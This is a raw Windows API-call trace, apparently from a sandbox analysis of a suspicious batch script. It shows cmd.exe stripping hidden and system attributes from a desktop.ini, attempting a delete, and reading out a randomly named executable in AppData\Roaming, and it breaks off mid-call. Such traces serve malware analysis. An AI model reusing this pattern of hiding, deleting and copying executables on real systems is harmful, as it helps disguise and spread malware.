[0232.570] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.570] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.571] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.571] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.571] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.571] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efc00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efc00, lpFilePart=0x1efbfc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efbfc*="Desktop") returned 0x18 [0232.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.571] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef97c | out: lpFindFileData=0x1ef97c) returned 0x3b10a0 [0232.571] FindClose (in: hFindFile=0x3b10a0 | out: hFindFile=0x3b10a0) returned 1 [0232.571] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef97c | out: lpFindFileData=0x1ef97c) returned 0x3b10a0 [0232.571] FindClose (in: hFindFile=0x3b10a0 | out: hFindFile=0x3b10a0) returned 1 [0232.572] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef97c | out: lpFindFileData=0x1ef97c) returned 0x3b10a0 [0232.572] FindClose (in: hFindFile=0x3b10a0 | out: hFindFile=0x3b10a0) returned 1 [0232.572] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.572] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.572] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.572] GetEnvironmentStringsW () returned 0x3b08c0* [0232.572] FreeEnvironmentStringsW (penv=0x3b08c0) returned 1 [0232.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.573] GetConsoleOutputCP () returned 0x1b5 [0232.761] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.761] GetUserDefaultLCID () returned 0x409 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efd40, cchData=128 | out: lpLCData="0") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efd40, cchData=128 | out: lpLCData="0") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efd40, cchData=128 | out: lpLCData="1") 
returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.762] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.763] GetConsoleTitleW (in: lpConsoleTitle=0x3a0c20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.763] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.763] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.763] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.764] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0232.764] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0232.764] _wcsicmp 
(_String1="FOR/?", _String2="attrib") returned 5 [0232.764] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0232.764] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0232.764] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0232.764] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0232.767] _wcsicmp (_String1="del", _String2=")") returned 59 [0232.767] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0232.767] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0232.767] _wcsicmp (_String1="IF", _String2="del") returned 5 [0232.767] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0232.767] _wcsicmp (_String1="REM", _String2="del") returned 14 [0232.767] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0232.769] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.769] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.770] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.770] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.770] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.770] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.770] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0232.773] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.773] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0232.777] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.778] FindClose (in: hFindFile=0x3b0dc8 | out: hFindFile=0x3b0dc8) returned 1 [0232.778] FindClose (in: hFindFile=0x3b0dc8 | out: hFindFile=0x3b0dc8) returned 1 [0232.778] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0232.778] _wcsicmp (_String1=".EXE", 
_String2=".CMD") returned 2 [0232.778] GetConsoleTitleW (in: lpConsoleTitle=0x1ef768, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.778] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef5f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef6b8 | out: lpAttributeList=0x1ef5f0, lpSize=0x1ef6b8) returned 1 [0232.778] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef5f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef6b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef5f0, lpPreviousValue=0x0) returned 1 [0232.778] GetStartupInfoW (in: lpStartupInfo=0x1ef5ac | out: lpStartupInfo=0x1ef5ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0232.779] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0232.780] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef64c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef698 | out: lpCommandLine="attrib -r -s -h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessInformation=0x1ef698*(hProcess=0x50, hThread=0x4c, dwProcessId=0x958, dwThreadId=0xd0)) returned 1 [0232.867] CloseHandle (hObject=0x4c) returned 1 [0232.867] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0232.867] GetEnvironmentStringsW () returned 0x3b2e00* [0232.867] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0232.867] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0232.918] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef58c | out: lpExitCode=0x1ef58c*=0x0) returned 1 [0232.918] CloseHandle (hObject=0x50) returned 1 [0232.918] _vsnwprintf (in: _Buffer=0x1ef6d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef598 | out: _Buffer="00000000") returned 8 [0232.918] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0232.918] GetEnvironmentStringsW () returned 0x3b25e0* [0232.918] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0232.918] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0232.918] GetEnvironmentStringsW () returned 0x3b25e0* [0232.918] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0232.918] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef5f0 | out: lpAttributeList=0x1ef5f0) [0232.918] GetConsoleTitleW (in: lpConsoleTitle=0x1ef970, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\desktop.ini")) returned 0xffffffff [0232.919] GetLastError () returned 0x2 [0232.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1")) returned 0x10 [0232.919] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0232.919] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0232.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\desktop.ini")) returned 0xffffffff [0232.919] GetLastError () returned 0x2 [0232.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ef41c | out: lpConsoleScreenBufferInfo=0x1ef41c) returned 1 [0232.920] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0232.985] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0232.985] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.986] GetFileType (hFile=0x50) returned 0x1 [0232.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.987] GetFileType (hFile=0x50) returned 0x1 [0232.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.987] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType (hFile=0x50) returned 0x1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] WriteFile 
(in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType (hFile=0x50) returned 0x1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType (hFile=0x50) returned 0x1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType (hFile=0x50) returned 0x1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] GetFileType (hFile=0x50) returned 0x1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] GetFileType (hFile=0x50) returned 0x1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, 
nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.989] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.989] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 
[0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.991] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.991] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 
[0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, 
lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.992] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.992] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 
[0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, 